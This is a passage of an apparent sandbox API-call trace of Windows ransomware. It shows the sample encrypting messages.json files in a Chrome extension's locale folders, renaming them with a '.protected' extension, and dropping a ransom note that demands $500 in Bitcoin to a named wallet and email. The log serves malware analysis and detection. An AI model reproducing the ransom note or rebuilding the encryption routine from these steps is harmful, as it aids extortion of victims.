(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.501] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.501] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.501] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.501] CloseHandle (hObject=0x164) returned 1 [0081.501] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0081.501] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0081.502] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR") returned 144 [0081.502] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0081.502] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0081.502] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*") returned 146 [0081.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.503] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.503] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.503] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.503] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.503] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.503] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\.") returned 146 [0081.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.503] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.503] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.503] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.503] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.503] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.503] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.503] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\..") returned 147 [0081.503] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.503] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.503] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.503] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0081.503] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.503] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.503] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.503] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.504] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0081.504] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.504] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0081.504] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.504] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json") returned 158 [0081.504] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.504] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0081.504] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.504] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0081.505] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.505] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.505] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.505] CloseHandle (hObject=0x168) returned 1 [0081.505] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0081.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0081.505] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.505] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.505] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0081.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.506] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.506] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.506] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.506] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.507] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.507] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.507] CloseHandle (hObject=0x164) returned 1 [0081.507] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0081.507] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0081.507] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT") returned 144 [0081.507] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0081.507] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0081.507] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*") returned 146 [0081.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.507] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.507] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.507] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.507] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.507] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.507] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\.") returned 146 [0081.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.507] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.507] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.507] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.507] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.507] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.507] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.507] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\..") returned 147 [0081.507] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.507] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.507] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.507] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.508] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.508] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.508] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.508] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0081.508] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.508] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.508] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.508] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.508] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0081.508] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.508] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0081.508] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.508] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json") returned 158 [0081.508] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.508] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0081.509] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.509] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0081.509] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.509] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.509] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.509] CloseHandle (hObject=0x168) returned 1 [0081.509] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0081.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0081.510] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.510] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.510] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0081.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.510] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.510] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.511] lstrlenA 